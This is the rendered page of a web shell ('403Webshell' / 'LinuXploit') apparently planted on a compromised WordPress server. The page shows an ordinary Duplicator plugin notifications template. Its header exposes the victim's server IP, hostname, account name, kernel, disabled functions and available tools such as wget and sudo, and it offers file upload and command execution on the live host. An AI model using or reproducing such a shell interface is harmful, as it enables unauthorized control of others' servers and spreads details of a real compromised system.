403Webshell
Server IP : 199.250.200.62  /  Your IP : 216.73.217.89
Web Server : Apache
System : Linux vps37394.inmotionhosting.com 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User : jasonp18 ( 1000)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/jasonp18/public_html/wp-content/plugins/duplicator/template/parts/Notifications/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/jasonp18/public_html/wp-content/plugins/duplicator/template/parts/Notifications/main.php
<?php
/**
 * Admin Notifications template.
 *
 * Variables
 *
 * @var \Duplicator\Core\Views\TplMng  $tplMng
 * @var array<string, mixed> $tplData
 */

defined('ABSPATH') || exit;

?>
<div id="dup-notifications">
    <div class="dup-notifications-header">
        <div class="dup-notifications-bell">
        <img src="<?php echo DUPLICATOR_PLUGIN_URL; ?>assets/img/notification-bell.svg"/>
            <span class="wp-ui-notification dup-notifications-circle"></span>
        </div>
        <div class="dup-notifications-title"><?php esc_html_e('Notifications', 'duplicator'); ?></div>
    </div>

    <div class="dup-notifications-body">
        <a class="dismiss" title="<?php esc_attr_e('Dismiss this message', 'duplicator'); ?>"><i class="fa fa-times-circle" aria-hidden="true"></i></a>

        <?php if (count($tplData['notifications']) > 1) : ?>
            <div class="navigation">
                <a class="prev">
                    <span class="screen-reader-text"><?php esc_attr_e('Previous message', 'duplicator'); ?></span>
                    <span aria-hidden="true">&lsaquo;</span>
                </a>
                <a class="next">
                    <span class="screen-reader-text"><?php esc_attr_e('Next message', 'duplicator'); ?></span>
                    <span aria-hidden="true">&rsaquo;</span>
                </a>
            </div>
        <?php endif; ?>

        <div class="dup-notifications-messages">
            <?php foreach ($tplData['notifications'] as $notification) {
                $tplMng->render('parts/Notifications/single-message', $notification);
            } ?>
        </div>
    </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit